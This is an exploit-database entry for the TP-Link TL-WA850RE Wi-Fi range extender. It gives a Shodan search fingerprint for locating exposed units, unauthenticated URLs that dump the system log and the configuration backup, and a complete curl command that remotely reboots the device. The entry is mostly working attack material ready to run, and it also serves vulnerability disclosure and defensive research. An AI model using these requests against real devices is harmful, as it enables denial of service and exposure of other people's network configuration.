TP-Link TL-WA850RE Wi-Fi Range Extender - Unauthenticated Remote Reboot Vulnerability

2018-04-26T00:00:00
ID 1337DAY-ID-30266
Type zdt
Reporter Wadeek
Modified 2018-04-26T00:00:00

Description

Exploit for hardware platform in category web applications

                                        
                                            # Exploit Title: TP-Link Technologies TL-WA850RE Wi-Fi Range Extender | Unauthorized Remote Reboot
# Exploit Author: Wadeek
# Vendor Homepage: https://www.tp-link.com/
# Firmware Link: https://www.tp-link.com/en/download/TL-WA850RE.html
# Category: dos
 
1. www.shodan.io (with title "Opening...")
 
"HTTP/1.1 200 OK" "Server: TP-LINK HTTPD/1.0" "COOKIE="
 
2. Proof of Concept
 
 
:System Log:
/data/systemlog.txt?operation=save
 
:Encrypted Configuration File:
/data/config.bin?operation=backup
 
:Reboot:
curl --silent 'http://[IP]/data/reboot.json' -H 'Host: [IP]' -H 'Accept: application/json, text/javascript, */*;' --compressed -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Cookie: COOKIE=' -H 'Connection: keep-alive' --data 'operation=write'

#  0day.today [2018-04-26]  #